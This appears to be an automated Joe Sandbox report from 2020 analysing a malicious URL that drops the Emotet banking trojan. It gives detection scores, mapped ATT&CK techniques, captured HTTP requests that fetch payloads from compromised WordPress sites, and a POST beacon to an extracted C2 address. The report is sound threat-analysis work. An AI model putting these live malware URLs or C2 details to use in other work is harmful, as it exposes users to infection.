
Analysis Report https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 205759
Start date: 04.02.2020
Start time: 19:04:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: urldownload.jbs
Sample URL: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.win@13/22@3/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 64.3% (good quality ratio 62.1%)
  • Quality average: 83.6%
  • Quality standard deviation: 24.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 45
  • Number of non-executed functions: 457
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 52.109.88.38, 52.109.124.24, 52.109.120.23, 52.109.88.39, 13.107.3.128, 13.107.5.88, 52.109.32.27, 52.109.8.19, 13.88.28.53, 67.27.150.254, 8.247.210.254, 67.26.109.254, 8.238.20.254, 8.238.23.254, 72.21.81.240, 67.27.234.126, 67.27.233.126, 8.248.141.254, 8.253.95.121, 8.241.9.126, 93.184.221.240, 67.27.157.126, 67.26.75.254, 8.241.9.254, 8.248.129.254, 67.27.158.254, 13.107.4.50, 67.27.158.126, 8.248.127.254, 8.247.209.254, 8.238.24.126, 67.24.35.254, 8.248.5.254
  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, prd.col.aria.mobile.skypedata.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, auto.au.download.windowsupdate.com.c.footprint.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, config.edge.skype.com, pipe.cloudapp.aria.akadns.net, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, s-0001.s-msedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, prod.nexusrules.live.com.akadns.net, afdap.au.au-msedge.net, au.au-msedge.net, pipe.skype.com, config.officeapps.live.com, au.c-0001.c-msedge.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy  | Score | Range   | Reporting | Whitelisted | Threat | Detection
Threshold | 100   | 0 - 100 | false     |             | Emotet | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      | Confidence


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Windows Management Instrumentation 11 | Hidden Files and Directories 1 | Valid Accounts 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 1 | System Time Discovery 2 | Remote File Copy 4 | Input Capture 1 | Data Encrypted 11 | Commonly Used Port 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Replication Through Removable Media | PowerShell 4 | Valid Accounts 1 | Access Token Manipulation 1 | Scripting 1 | Network Sniffing | Security Software Discovery 11 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting 1 | Modify Existing Service 11 | Process Injection 11 | Obfuscated Files or Information 2 | Input Capture | System Service Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol 22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API 121 | New Service 2 | New Service 2 | Masquerading 231 | Credentials in Files | File and Directory Discovery 2 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol 4 | SIM Card Swap | Premium SMS Toll Fraud |
Exploit Public-Facing Application | Graphical User Interface 1 | Shortcut Modification | File System Permissions Weakness | Hidden Files and Directories 1 | Account Manipulation | System Information Discovery 39 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol 5 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Spearphishing Link | Command-Line Interface 112 | Modify Existing Service | New Service | Valid Accounts 1 | Brute Force | Virtualization/Sandbox Evasion 2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features |
Spearphishing Attachment | Service Execution 12 | Path Interception | Scheduled Task | Virtualization/Sandbox Evasion 2 | Two-Factor Authentication Interception | Process Discovery 2 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation 1 | Bash History | Application Window Discovery 11 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection 11 | Input Prompt | Remote System Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | Data Destruction |

Signature Overview



AV Detection:

Antivirus detection for URL or domain
  • Source: http://home.mu4viet.net/wp-includes/hddg0/ | Avira URL Cloud: Label: malware
  • Source: https://bigdataprofile.com/d8bhg/7mf/ | Google Safe Browsing: Label: phishing
  • Source: http://demo.tuzlapaslanmaz.com/wp-admin/sj33/ | Avira URL Cloud: Label: malware
Found malware configuration
  • Source: driverthunk.exe.5872.14.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["209.146.22.34/cZ0e2Pg5vIvmxy2"]}
Multi AV Scanner detection for dropped file
  • Source: C:\Users\user\546.exe | Virustotal: Detection: 9%
Machine Learning detection for dropped file
  • Source: C:\Users\user\Desktop\download\O_45870184.rtf | Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,14_2_00F8207B
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,14_2_00F81FFC
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,14_2_00F81F75
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81F11 CryptExportKey,14_2_00F81F11
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,14_2_00F8215A
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81F56 CryptGetHashParam,14_2_00F81F56

Spreading:

Contains functionality to enumerate / list files inside a directory
  • Source: C:\Users\user\546.exe | Code function: 11_2_00442282 lstrlenA,FindFirstFileA,FindClose,11_2_00442282
  • Source: C:\Users\user\546.exe | Code function: 12_2_00442282 lstrlenA,FindFirstFileA,FindClose,12_2_00442282
  • Source: C:\Users\user\546.exe | Code function: 12_2_004417BA __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,12_2_004417BA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Source: Traffic | Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.6:49881 -> 209.146.22.34:443
HTTP GET or POST without a user agent
  • Source: global traffic | HTTP traffic detected:
        GET /wp-includes/hddg0/ HTTP/1.1
        Host: home.mu4viet.net
        Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected:
        GET /wp-admin/sj33/ HTTP/1.1
        Host: demo.tuzlapaslanmaz.com
        Connection: Keep-Alive
Connects to IPs without corresponding DNS lookups
  • Source: unknown | TCP traffic detected without corresponding DNS query: 70.187.114.147
  • Source: unknown | TCP traffic detected without corresponding DNS query: 70.187.114.147
  • Source: unknown | TCP traffic detected without corresponding DNS query: 70.187.114.147
  • Source: unknown | TCP traffic detected without corresponding DNS query: 209.146.22.34
  • Source: unknown | TCP traffic detected without corresponding DNS query: 209.146.22.34
  • Source: unknown | TCP traffic detected without corresponding DNS query: 209.146.22.34
  • Source: unknown | TCP traffic detected without corresponding DNS query: 209.146.22.34
  • Source: unknown | TCP traffic detected without corresponding DNS query: 209.146.22.34
Contains functionality to download additional files from the internet
  • Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81383 InternetReadFile,14_2_00F81383
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected:
        GET /wp-includes/hddg0/ HTTP/1.1
        Host: home.mu4viet.net
        Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected:
        GET /wp-admin/sj33/ HTTP/1.1
        Host: demo.tuzlapaslanmaz.com
        Connection: Keep-Alive
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: wentworthfallspots.com.au
Posts data to webserver
  • Source: unknown | HTTP traffic detected:
        POST /cZ0e2Pg5vIvmxy2 HTTP/1.1
        Referer: http://209.146.22.34/cZ0e2Pg5vIvmxy2
        Content-Type: application/x-www-form-urlencoded
        DNT: 1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: 209.146.22.34:443
        Content-Length: 662
        Connection: Keep-Alive
        Cache-Control: no-cache
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
  • Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 04 Feb 2020 18:06:13 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        Link: <http://home.mu4viet.net/wp-json/>; rel="https://api.w.org/"
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Keep-Alive: timeout=5, max=150
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Data Raw: (hex dump of the HTML response body omitted)
Urls found in memory or binary data
  • Source: driverthunk.exe, 0000000E.00000002.4732324935.000000000019B000.00000004.00000001.sdmp | String found in binary or memory: http://209.146.22.34/cZ0e2Pg5vIvmxy2
  • Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.dr | String found in binary or memory: http://coalitionbay.com/nysri/iiI/
  • Source: wget.exe, 00000002.00000002.4302546803.0000000000F4E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl
  • Source: wget.exe, 00000002.00000002.4302546803.0000000000F4E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
  • Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
  • Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.dr | String found in binary or memory: http://demo.tuzlapaslanmaz.com/wp-admin/sj33/
  • Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.dr | String found in binary or memory: http://home.mu4viet.net/wp-includes/hddg0/
  • Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com
  • Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.aadrm.com/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.diagnostics.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.microsoftstream.com/api/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.onedrive.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://apis.live.net/v5.0/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://augloop.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  • Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.dr | String found in binary or memory: https://bigdataprofile.com/d8bhg/7mf/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cdn.entity.
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://clients.config.office.net/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://config.edge.skype.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://cr.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dataservice.o365filtering.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dataservice.o365filtering.com/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://devnull.onenote.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://directory.services.
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://graph.ppe.windows.net
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://graph.ppe.windows.net/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://graph.windows.net
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://graph.windows.net/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://incidents.diagnostics.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
  • Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.dr | String found in binary or memory: https://jebkhata.com/wp-includes/8l8yd7/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://lifecycle.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://login.microsoftonline.com/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://login.windows.local
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://management.azure.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://management.azure.com/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://messaging.office.com/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ncus-000.contentsync.
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ncus-000.pagecontentsync.
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://officeapps.live.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://onedrive.live.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://onedrive.live.com/embed?
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://powerlift.acompli.net
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
  • Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://settings.outlook.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://shell.suite.office.com:1443
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://skyapi.live.net/Activity/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
